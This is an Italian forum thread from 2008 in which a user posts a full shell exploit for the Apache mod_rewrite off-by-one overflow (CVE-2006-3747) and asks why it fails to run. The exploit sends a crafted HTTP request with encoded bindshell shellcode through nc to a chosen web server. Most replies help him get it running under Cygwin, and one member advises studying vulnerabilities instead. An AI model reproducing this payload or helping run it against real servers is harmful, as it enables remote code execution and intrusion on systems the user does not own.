Forum programmazione

GidanTKA · by **GidanTKA** on Tue Jul 29, 2008 11:03 pm

Salve a tutti, io ho scaricato questo exploit:

Code: Select all: #!/bin/sh # Exploit for Apache mod_rewrite off-by-one. # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # # Thx to xuso for help me with the shellcode. # # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified # for avoiding apache url-escape.. Take a look is quite nice ;) # # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at # 0x0834ae77 for any other version/system find it. # # Gulcas rulez :P echo -e "mod_rewrite apache off-by-one overflow" echo "by jack <jack\x40gulcas\x2eorg>\n\n" if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi host=$1 echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\ %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\ %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\ %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\ %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\ %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\ %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\ %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\ %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\ %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\ Host: $host\r\n\r\n" | nc $host 80 # milw0rm.com [2006-08-21]

Ma quando lo avvio dal prompt mi da un errore tipo:

Can't exec /bin/sh C:\document\ecc\exploit.pl line 1

qualcuno sa darmi un indicazione?
Grazie

**Sponsor**

DoMinO · by **DoMinO** on Wed Jul 30, 2008 1:12 pm

Prova a cancellare i commenti.

DaD · by **DaD** on Wed Jul 30, 2008 1:23 pm

Quello non è perl ma bash, quindi ti serve una shell linux per eseguirlo, sotto windows c'è cygwin che fa al caso tuo.

k8 · by k8 on Wed Jul 30, 2008 1:33 pm

Sposto in Altri.
Avviando exploit non impari niente, studiati da solo le vulnerabilità e prova a semplificare le azioni con un exploit scritto nel linguaggio che conosci.
E' un consiglio, per imparare e far qualcosa di costruttivo

GidanTKA · by **GidanTKA** on Wed Jul 30, 2008 3:44 pm

k8 wrote:Sposto in Altri.
Avviando exploit non impari niente, studiati da solo le vulnerabilità e prova a semplificare le azioni con un exploit scritto nel linguaggio che conosci.
E' un consiglio, per imparare e far qualcosa di costruttivo

Grazie per il tuo consiglio, ne terrò conto.
Son consapevole in modo netto di ciò che dici, ma ormai, cioè, è diventata una questione di principio.
In ogni caso ora ho scoperto l'esistenza di Cygwin.

Comunque non ti preoccupare per me, non rimarrò di certo sempre fermo su questi punti.

GidanTKA · by **GidanTKA** on Wed Jul 30, 2008 3:46 pm

DaD wrote:Quello non è perl ma bash, quindi ti serve una shell linux per eseguirlo, sotto windows c'è cygwin che fa al caso tuo.

Si, poi me ne son accorto, mi sapresti gentilmente indicare una guida per i comandi di Cygwin?

k8 · by k8 on Wed Jul 30, 2008 3:48 pm

GidanTKA wrote:
DaD wrote:Quello non è perl ma bash, quindi ti serve una shell linux per eseguirlo, sotto windows c'è cygwin che fa al caso tuo.

Si, poi me ne son accorto, mi sapresti gentilmente indicare una guida per i comandi di Cygwin?

Google aiuta
:arrow:

http://www.mondoinformatico.info/esegui ... t-199.html

GidanTKA · by **GidanTKA** on Wed Jul 30, 2008 9:25 pm

k8 wrote:
GidanTKA wrote:
DaD wrote:Quello non è perl ma bash, quindi ti serve una shell linux per eseguirlo, sotto windows c'è cygwin che fa al caso tuo.

Si, poi me ne son accorto, mi sapresti gentilmente indicare una guida per i comandi di Cygwin?

Google aiuta
http://www.mondoinformatico.info/esegui ... t-199.html

Si, ho già cercato su google, ma non trovo nulla di utile, io vorrei semplicemente riuescir ad avviare quello script, ho installato Cygwin ma ora come devo fare per poterlo avviare?

DaD · by **DaD** on Thu Jul 31, 2008 11:26 am

Dalla shell di cygwin dai:

Code: Select all: $ chmod +x tuoscrip.sh && ./tuoscript.sh

Devi mettere lo script nella tua home che suppongo si trovi in C:\cygwin\home\tuo_nick

GidanTKA · by **GidanTKA** on Thu Jul 31, 2008 12:25 pm

DaD wrote:Dalla shell di cygwin dai:

Code: Select all
$ chmod +x tuoscrip.sh && ./tuoscript.sh

Devi mettere lo script nella tua home che suppongo si trovi in C:\cygwin\home\tuo_nick

ok. lo ho fatto, ma mi da degli errori:
http://img411.imageshack.us/img411/5591/immagineta9.jpg

questo vuoldire che c'è un errore nello script?

GidanTKA · by **GidanTKA** on Thu Jul 31, 2008 8:51 pm

Salve, vi ringrazio per il vostro aiuto, vi annuncio che io domani parto, spero che ci siate quando ritornerò in patria.

GidanTKA · by **GidanTKA** on Fri Aug 22, 2008 11:48 am

Salve, son ritornato dalle vacanze, ho provato ad avviare quello script ma mi da questo errore:
http://img411.imageshack.us/img411/5591/immagineta9.jpg

da cosa può dipendere??

cypher · by **cypher** on Mon Aug 25, 2008 9:07 am

a me sembra kiaro ke nn riconosce lo \r come comando (se le mie reminiscenze c nn tradiscono \r dovrebbe essere un aggiorna della riga).

per intenderci penso sia come l'errore dell'invio tra windows e linux (in uno è \crlf e nell'altro \lf o roba simile)

quindi documentati bene e vedi di trovare il corrispettivo per cygwin o meglio per gcc ke mi sembra ne sia il compilatore predefinito.

Forum programmazione

[exploit in bash]

[exploit in bash]

[exploit in bash]

Re: [exploit in perl]

Re: [exploit in perl]

Re: [exploit in perl]

Re: [exploit in perl]

Re: [exploit in perl]

Re: [exploit in perl]

Re: [exploit in perl]

Re: [exploit in bash]

Re: [exploit in bash]

Re: [exploit in bash]

Re: [exploit in bash]

Re: [exploit in bash]

Who is online